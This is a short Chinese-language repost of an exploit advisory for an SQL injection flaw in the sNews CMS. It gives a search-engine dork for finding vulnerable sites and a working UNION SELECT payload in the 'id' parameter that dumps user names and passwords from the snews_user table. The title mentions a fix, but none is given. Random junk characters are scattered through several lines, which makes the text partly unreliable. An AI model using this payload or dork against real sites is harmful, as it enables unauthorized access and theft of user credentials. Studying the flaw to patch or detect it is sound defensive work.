CMS snews SQL注射及修复

admin

标题: CMS snews SQL Injection Vulnerability
' ^# h3 q$ x9 Y# L' [1 w3 }作者: By onestree
下载地址 : http://snewscms.com/
9 L+ Q& |' f; X测试平台 : ubuntu 12.10 / win 7
0 R' V) D7 C9 z; p关键词: inurl:"tanyakan pada rumput yang bergoyang"

) }1 X) W, b/ V* E6 z, ^
, M5 O: V& F6 O: J+ ]) p4 w9 l*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

. g2 p* J6 E  c8 u, n( d! v示例

6 v; N+ B$ R! s& f% lhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*

' e! l9 R3 J  d* j! [! o
致谢:

  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
     
* z8 N7 e, l" `" K          indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*